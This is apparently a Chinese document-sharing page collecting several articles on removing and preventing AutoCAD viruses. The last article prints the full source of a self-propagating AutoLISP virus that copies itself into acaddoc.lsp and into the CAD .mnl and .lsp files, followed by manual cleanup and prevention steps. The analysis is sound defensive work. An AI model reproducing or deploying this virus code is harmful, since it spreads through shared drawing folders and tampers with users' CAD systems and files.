一种CAD病毒的清除与防范措施

合集下载

CAD中毒解决方案

CAD中毒解决方案

CAD中毒解决方案一、背景介绍CAD(计算机辅助设计)是一种广泛应用于工程设计和创造领域的软件工具。

然而,CAD系统也存在一些安全风险,如恶意软件、病毒和黑客攻击等,这可能导致CAD系统中毒。

本文将介绍CAD中毒的常见原因和解决方案。

二、CAD中毒的常见原因1. 恶意软件感染:用户通过下载和安装来自不可信来源的CAD软件或者插件,导致恶意软件感染CAD系统。

2. 病毒攻击:黑客利用漏洞或者弱密码等方式入侵CAD系统,植入病毒程序进行攻击。

3. 文件损坏:CAD文件在传输或者存储过程中被破坏,导致CAD系统无法正常工作。

三、CAD中毒的影响1. 数据丢失:CAD中毒可能导致设计文件损坏或者丢失,给工程项目带来不可估计的损失。

2. 系统崩溃:恶意软件或者病毒攻击可能导致CAD系统崩溃,造成工作中断和生产延误。

3. 安全风险:CAD中毒后,黑客可能窃取敏感设计文件,威胁企业的商业机密。

四、CAD中毒解决方案1. 安全意识培训:加强员工的安全意识培训,教育他们避免下载和安装来自不可信来源的CAD软件或者插件。

2. 定期更新和升级:及时更新CAD软件和操作系统的补丁,修复已知漏洞,提高系统的安全性。

3. 强化密码策略:使用强密码保护CAD系统,定期更换密码,并避免使用易被猜测的密码。

4. 安全备份:定期备份CAD设计文件,并将备份数据存储在离线、安全的位置,以防止文件损坏和丢失。

5. 权限管理:限制用户对CAD系统的访问权限,确保惟独授权人员可以访问和修改设计文件。

6. 安全软件使用:安装并定期更新杀毒软件、防火墙和恶意软件检测工具,及时发现和清除潜在的威胁。

7. 安全审计:定期进行CAD系统的安全审计,检查系统是否受到恶意软件或者黑客攻击,并及时采取措施修复漏洞。

五、CAD中毒的预防措施1. 下载软件可信度:只从官方网站或者可信的软件供应商处下载CAD软件和插件,避免从非官方渠道下载,以防感染恶意软件。

CAD中毒解决方案

CAD中毒解决方案

CAD中毒解决方案【摘要】本文介绍了CAD中毒解决方案,包括CAD中毒的定义、常见的CAD中毒症状、CAD中毒的危害、CAD中毒的解决方案以及预防CAD中毒的措施。

通过本文的阅读,读者将了解到如何应对CAD中毒问题,保障CAD系统的正常运行。

【正文】1. CAD中毒的定义CAD中毒是指计算机辅助设计(CAD)系统受到病毒、恶意软件或其他恶意攻击而导致系统出现异常或瘫痪的情况。

CAD中毒可能导致数据丢失、系统崩溃、机密信息泄露等问题,严重影响工程设计和生产。

2. 常见的CAD中毒症状CAD中毒可能表现为以下几种症状:- 系统运行缓慢:CAD软件运行速度明显变慢,响应时间延长。

- 文件损坏或丢失:CAD文件无法正常打开或出现损坏、丢失的情况。

- 弹窗广告:在CAD软件界面中出现大量的弹窗广告,影响正常操作。

- 崩溃或死机:CAD软件频繁崩溃或死机,无法正常使用。

- 数据泄露:CAD系统中的机密设计信息被非法获取或泄露。

3. CAD中毒的危害CAD中毒可能给企业和个人带来严重的危害,包括:- 生产延误:CAD系统崩溃或数据丢失会导致工程设计进度延误,影响生产计划。

- 数据泄露:CAD系统中的机密设计信息被窃取或泄露,可能导致商业机密外泄,给企业带来巨大损失。

- 安全风险:CAD中毒可能导致计算机系统被黑客攻击,进一步威胁企业的网络安全。

- 经济损失:CAD系统崩溃或数据丢失需要花费大量时间和金钱进行修复,给企业带来经济损失。

4. CAD中毒的解决方案针对CAD中毒问题,可以采取以下解决方案:- 安装杀毒软件:在CAD系统中安装可靠的杀毒软件,定期更新病毒库,及时发现并清除潜在的病毒和恶意软件。

- 定期备份数据:定期备份CAD系统中的重要数据,以防止数据丢失或损坏,同时确保备份数据的安全性。

- 更新操作系统和软件:定期更新CAD系统所依赖的操作系统和软件,及时修复漏洞,提高系统的安全性和稳定性。

- 加强网络安全:采取有效的网络安全措施,如防火墙、入侵检测系统等,保护CAD系统免受网络攻击。

CAD病毒

CAD病毒
CAD病毒
专门感染CAD的病毒
01 ቤተ መጻሕፍቲ ባይዱ染传播
03 病毒预防
目录
02 解决办法
专门感染CAD的病毒,一般在你的CAD文件的目录下生成ACAD.lsp文件。.lsp文件是Auto lsp程序,它的内 容对电脑没有危害,但可能会损坏你做的图。
感染传播
该病毒利用CAD的读取机制,在第一次打开带有病毒的图纸后,该病毒即悄悄运行,并感染每一张新打开的 图纸,将病毒文件到处复制,并生成很多名为acad.lsp的程序。即便是重装CAD甚至重装系统都不能解决问题。 病毒感染计算机系统后,会在搜索AutoCAD软件数据库路径下的自动运行文件(acad.lsp)后,生成一个备份文件 acadapp.lsp,其内容和自动运行文件一样。打开CAD图纸时,软件就会运行加载该文件,同时在存放图纸文件的目 录中生成两个文件(acad.lsp和acadapp.lsp)的副本。
病毒预防
CAD病毒有多种症状(上面提到的只是症状之一)。预防CAD病毒有效方法是:从别处复制来图形文件夹,首 先要查看一下是否有类似acad.lsp、acad.fas等非图形文件,如果有就直接删除。之后打开该文件夹下的图形文 件时才可避免感染,否则系统即会被染毒。
感谢观看
解决办法
临时办法
彻底清除
CAD在启动时会弹出一个显示时间的对话框,在8:00至18:00之间,除了会有对话框,并且输入文字时可能有 的以记事本出现,没有其它大的影响,在这个时间以外,就会伴随着"移动"命令就成“复制”等情况,让人不胜 其扰。
在这时间内的临时解决方案为:将电脑系统时间调整1900年随意时间就行了 (有必要时请关了CAD后再重新打 开)
方法一: CAD病毒专杀 CAD杀毒下载CAD杀毒V2.9进行查杀 ,CAD杀毒会自动修复被感染文件,可以防止再次感染, 并实时防护 方法二: 1、关闭CAD(一定要先关闭正在运行的CAD程序)。 2、F3键打开XP系统的文件搜索窗口,搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。 注意:“搜索范围”一定要选择“本机硬盘驱动器...”,并勾选“搜索选项”中的“高级选项”,将其下 的“搜索系统文件夹”、“搜索隐藏的文件和文件夹”和“搜索子文件夹”项都勾选上,否则不能将这3个文件全 部搜索清除干净。 3、复制下面的红色代码在CAD命令行运行,以恢复被修改的系统变量默认值: (while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) 4、用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。(如“acad.

cad病毒acad处理

cad病毒acad处理

cad病毒acad处理cad病毒acad处理这是一种病毒,但不用重装,可以杀的一、彻底的解决方案1:(主要是acad.fas程序文件)1、清除方法是删除干净acad.fas与lcm.fas两个文件!如果删除不净下次启动是还是会生成,务必清理干净!同时搜acad.lsp和acadapp.lsp删掉2、进入“C:\\Documents and Settings\\用户名\\Application Data\\Autodesk\\AutoCAD 2005\\R16.1\\chs\\support"如果有acad.fas,删除打开acad.mnl,末尾如有不明代码,删除。

清除步骤:1.退出CAD。

2.全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件,然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

搜索时选择“查找所有文件及文件夹”,然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。

如果搜出的文件无法删除,则先清空回收站,再搜索删除。

注:探索者目录下有个AcadDoc.lsp(注意大小写)不是病毒文件,谨防误删。

3.查看C盘根目录下是否有boot.dat文件,如有,则将其删除。

4.进入C:\\Documents and Settings\\用户名\\Application Data\\Autodesk\\AutoCAD 2006(或AutoCAD2004)\\R16.2\\chs\\Support目录,用记事本打开该目录下的所有*.mnl文件,手动删除与附件1相同的代码(一般都在文件末尾),然后保存。

并将修改后的所有*.mnl文件属性设置为“只读”。

5.进入CAD安装目录下的support目录,将该目录下的所有*.lsp 文件按步骤4方法处理。

记得将其属性设为“只读”。

CAD病毒预防与查杀防治手册

CAD病毒预防与查杀防治手册

1.CAD病毒的简介与危害CAD病毒,实际上是基于CAD程序支持的vlisp语言编写的一类代码。

它和你用过的绝大多数CAD小插件其实一样,是必须依附于CAD环境下才能运行的程序。

1.1目前常见CAD病毒有以下几个特点:1.它完全依附于CAD运行,在不打开CAD的情况下,它既不会运行,也不会主动传播。

2.它的作用范围仅限于CAD及其附属插件(如天正、探索者等);不会破坏CAD软件本身,但可能改乱CAD 设置、改乱CAD图纸数据。

3.除了CAD及其附属插件(如天正、探索者等)外,你电脑里别的软件卡、慢、崩溃,或者系统卡、慢、蓝屏死机,这些都跟CAD病毒没有一毛钱关系。

4.由于目前新的WIN7、WIN10系统权限严格,免费杀毒软件普及,CAD版本不断升级,CAD病毒作用范围有限,给病毒作者带来不了收益,所以基本上没有新出来的CAD病毒了,还在流行的CAD病毒,都是十多年前遗留下来的,很古老的。

1.2目前还在流行的CAD病毒存在以下几点危害:1.部分CAD病毒会搞一些无聊的弹窗【不吃饭了快干活、党不会亏待你、现在时间是XX等等】,但是这类病毒太显眼,已经被杀的差不多了,比较少见.2.大多数还在流行的病毒,都是后台默默感染传播,没有任何提示,不注意是看不到的。

这类病毒的代码里,还能运行的主要是他的自身复制传播功能、修改CAD设置、修改图纸数据功能。

所以一些CAD病毒会乱改你CAD 设置、图纸设置、图纸数据,导致CAD操作异常、复制粘贴出问题、图纸文件异常大等,这是它的主要危害之一。

3.正如前边说的,CAD病毒大多比较古老,代码陈旧,而软件更新换代,病毒的代码运行已经出现很多缺陷、错误。

当你中CAD病毒的同时,你又在使用探索者、天正之类基于CAD的插件,在这些软件打开加载的时候,CAD病毒同时也在加载,且它的代码存在缺陷错误而卡住、或进入死循环,常常同时导致天正探索者加载失败或者在加载时卡死,这也是它目前最主要的危害之一。

CAD中毒解决方案

CAD中毒解决方案

CAD中毒解决方案概述:CAD中毒是指计算机辅助设计(CAD)软件受到病毒、恶意软件或者其他安全威胁的影响,导致系统运行不稳定、数据丢失或者被篡改等问题。

为了保护CAD系统的安全和稳定性,需要采取一系列解决方案来应对CAD中毒的风险。

解决方案一:安全软件保护安全软件是防止计算机受到病毒和恶意软件攻击的关键工具。

为了保护CAD 系统的安全,可以安装并定期更新一款可靠的安全软件,如杀毒软件、防火墙和恶意软件清除工具。

这些软件可以实时监测和阻挠潜在的安全威胁,并进行病毒扫描和清除。

解决方案二:定期备份数据定期备份CAD系统中的重要数据是防止数据丢失的有效措施。

可以使用外部存储设备,如硬盘驱动器或者云存储服务,将CAD文件备份到安全的位置。

最好每天或者每周进行备份,并确保备份文件是完整的和可恢复的。

解决方案三:更新CAD软件和插件CAD软件和插件的更新通常包含了对已知漏洞和安全问题的修复。

及时更新CAD软件和插件可以提高系统的安全性和稳定性,减少受到攻击的风险。

可以定期检查CAD软件和插件的官方网站或者应用商店,下载并安装最新版本的软件和插件。

解决方案四:限制网络访问权限限制CAD系统的网络访问权限可以减少受到网络攻击的风险。

可以通过防火墙、网络隔离和访问控制列表等措施来限制CAD系统与外部网络的连接。

只允许必要的网络连接,并禁止未经授权的访问。

解决方案五:教育培训和意识提升教育培训和意识提升对于CAD系统的安全至关重要。

通过培训用户了解常见的安全威胁和防范措施,可以匡助他们更好地保护CAD系统。

提醒用户不要打开可疑的电子邮件附件或者下载未经验证的软件,以及定期更新密码和使用强密码等最佳实践。

解决方案六:定期系统检查和维护定期对CAD系统进行检查和维护可以匡助发现和解决潜在的安全问题。

可以使用系统工具进行磁盘清理、注册表修复和软件更新等操作,以确保CAD系统的正常运行和安全性。

解决方案七:安全策略和流程制定制定适合CAD系统的安全策略和流程可以匡助组织更好地管理和应对安全威胁。

CAD病毒是什么怎么清除

CAD病毒是什么怎么清除

CAD病毒是什么怎么清除CAD相信很多学建筑或者图形设计的人们都使用过,那么CAD病毒是什么呢?遇到了怎么解决?本文就来教大家使用手动设置查杀CAD 病毒的方法,具体步骤请看下文。

CAD病毒查杀方法介绍:手动查杀CAD病毒:1、关闭CAD(一定要先关闭正在运行的CAD程序)。

2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

3、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值:01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。

(如"acad.mnl"文件中无此行代码可忽略此操作)附:"acad.mnl"文件可能在下面的目录中,C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名,200×和R×.×分别是CAD 的版本和版本代号。

(注意:目录C:\Documents and Settings\是系统隐藏文件夹)补充:电脑常见的病毒:1.文件型病毒文件型病毒是一种受感染的可执行文件,也就是.exe病毒文件。

当执行受感染的文件时,电脑病毒会将自己复制到其他可执行文件中,导致其他文件受感染。

CAD中毒解决方案

CAD中毒解决方案

CAD中毒解决方案CAD(计算机辅助设计)是一种广泛应用于工程设计、制造和建筑等领域的技术工具。

然而,由于各种原因,CAD系统可能会遭受到恶意软件、病毒和其他安全威胁的攻击,从而导致CAD中毒。

本文将介绍CAD中毒的解决方案,以保护CAD系统的安全。

1. 安装可靠的防病毒软件:为了保护CAD系统免受病毒和恶意软件的攻击,首先需要安装一款可靠的防病毒软件。

该软件应具备实时监测和阻止恶意软件的能力,并定期更新病毒库以识别新出现的威胁。

2. 定期进行系统和软件更新:及时安装CAD系统和相关软件的更新补丁是防止安全漏洞和弱点被攻击的重要措施。

这些更新通常包含了修复已知漏洞和提升系统安全性的功能。

3. 加强网络安全措施:CAD系统通常需要与网络连接,因此,加强网络安全措施是防止CAD中毒的关键。

首先,确保网络设备(如路由器和防火墙)的安全设置,并禁用不必要的服务和端口。

其次,配置强密码和网络加密,以防止未经授权的访问。

最后,定期监测网络流量和日志,及时发现异常活动。

4. 实施访问控制和权限管理:通过实施访问控制和权限管理,可以限制对CAD系统的访问和操作。

只有授权的用户才能访问系统,并且根据其职责和需求分配适当的权限。

这样可以减少内部人员的错误或恶意行为对CAD系统的影响。

5. 备份和恢复策略:制定完善的备份和恢复策略是防止CAD中毒的重要措施。

定期备份CAD文件和系统配置,并将备份数据存储在安全的地方。

在系统遭受攻击或数据丢失时,可以快速恢复到最近的备份点,减少损失。

6. 培训和意识提升:加强员工的安全意识和培训是防止CAD中毒的重要环节。

员工应被教育如何识别和避免潜在的安全威胁,如不打开来历不明的电子邮件附件或下载未经验证的软件。

7. 监控和审计:定期监控CAD系统的活动并进行审计,可以及时发现异常行为和安全事件。

使用安全信息和事件管理系统(SIEM)来收集和分析系统日志,以便快速检测和响应潜在的威胁。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

一种CAD病毒的清除与防范措施
雪山飞猪 QQ534455
近来又出现一种AutoCAD病毒,该病毒与以往CAD病毒不同。

干净的CAD 系统当打开DWG图时,如果该图所在目录下有ACADDOC.LSP文件(基本为病毒传播文件),ACADDOC.LSP就会运行。

1.病毒的特征与传播方式
我们先看看病毒代码,代码如下:
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
);while
);progn
);if
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist))) (setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn (1+ lspn))
(load "acadapq")
(princ)
(load "acadapp")
(princ)
(load "acadapq")
(princ)
病毒代码运行后,首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。

support目录下的ACADDOC.LSP文件可能会被杀毒软件杀掉,但写入其他mnl和lsp文件中的病毒代码并未被清除,这就是为什么杀毒软件不能彻底杀CAD病毒的原因。

染毒后的病毒会在打开的DWG文件的目录下把病毒代码附加在ACADDOC.LSP 文件的尾部,如无ACADDOC.LSP文件就会创建新的并把病毒代码附加上。

从上我们可以看出,如在打开的DWG文件目录下有含病毒代码的ACADDOC.LSP文件,CAD病毒就会传播开。

2.病毒的清除
用写字板编辑中毒的mnl和lsp文件,从头开始找发现第一个(setq flagx t)时,把其及以后的代码通通去掉。

举例说明,我的CAD系统有两个目录会有染毒文件,一是C:\Documents and Settings\XXX\Application Data\Autodesk\AutoCAD Mechanical 2011\R18.1\chs\Support(XXX为你登录XP系统的用户名);二是D:\Program Files\Autodesk\ACADM 2011\Support。

同时要检查所有目录包括隐藏的目录是否有ACADDOC.LSP文件,有则删除。

3.防范措施
一是把病毒要感染的文件设为只读,二是在打开DWG图时,看看该DWG文件所在目录下是否有ACADDOC.LSP文件,有则先删除再打开DWG图。

(注:可编辑下载,若有不当之处,请指正,谢谢!)。

相关文档
最新文档